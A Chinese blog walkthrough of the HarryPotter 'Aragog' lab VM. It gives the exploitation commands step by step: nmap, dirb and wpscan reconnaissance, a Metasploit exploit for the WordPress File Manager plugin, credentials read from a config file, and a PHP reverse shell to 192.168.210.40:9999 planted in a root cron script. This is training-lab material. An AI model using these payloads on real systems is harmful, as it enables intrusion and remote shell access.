HarryPotter第一部—Aragog-1.0.2

Aragog 是 3 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。

信息收集

nmap扫描

nmap -sC -sV 192.168.210.148
在这里插入图片描述

IP地址靶机登录界面已经给出 根据扫描结果可得22ssh ,80http

网站信息收集

只有一张图片
在这里插入图片描述

爆破一下网站目录

dirb http://192.168.210.148
在这里插入图片描述

爆出来一个blog
在这里插入图片描述

页面有点奇怪,点击页面都会错误,推测需要域名解析,去/etc/hosts中写一下域名解析
在这里插入图片描述

在这里插入图片描述

哎,这就好了嘛
在这里插入图片描述

既然cms为wordpress那么必须得用wpscan跑一跑
直接扫没扫出什么有效信息,版本没有问题那可能插件有漏洞(noitce中提示),尝试wpscan注册账号,带上 api-token 跑一跑

注册wpscan一个账号 https://wpvulndb.com/users/sign_up

wpscan --api-token=免费版的就行 --url=http://192.168.210.148/blog -e p --plugins-detection aggressive
在这里插入图片描述

扫出3个问题,全是File Manager的漏洞
在这里插入图片描述

漏洞利用

msf getshell

msf检索漏洞exp
在这里插入图片描述

调试好参数

search wordpress File Manager
use 1
set rhosts wordpress.aragog.hogwarts
set targeturi /blog
set lhost 192.168.210.40
run

在这里插入图片描述

在这里插入图片描述

在/etc/wordpress/config-default.php 中发现了数据库的用户名密码
在这里插入图片描述

python调bash
python3 -c 'import pty; pty.spawn("/bin/bash");'

登录mysql数据库

查询数据库信息
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到用户hagrid98 P P PBYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
界面后可得 密码为password123
在这里插入图片描述

ssh登录

成功拿到第一个魂器
在这里插入图片描述

提权

在/opt下发现一个隐藏脚本,可以拷贝文件
在这里插入图片描述

在tmp下创建php反弹shell马

<?php $sock=fsockopen("192.168.210.40",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

?>

在这里插入图片描述

将脚本添加两行
在这里插入图片描述

kali建通端口,等待不超过1分钟
成功获得root权限
在这里插入图片描述

家目录下拿到第二个魂器
在这里插入图片描述

能弹shell的原因是root有一个计划任务
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值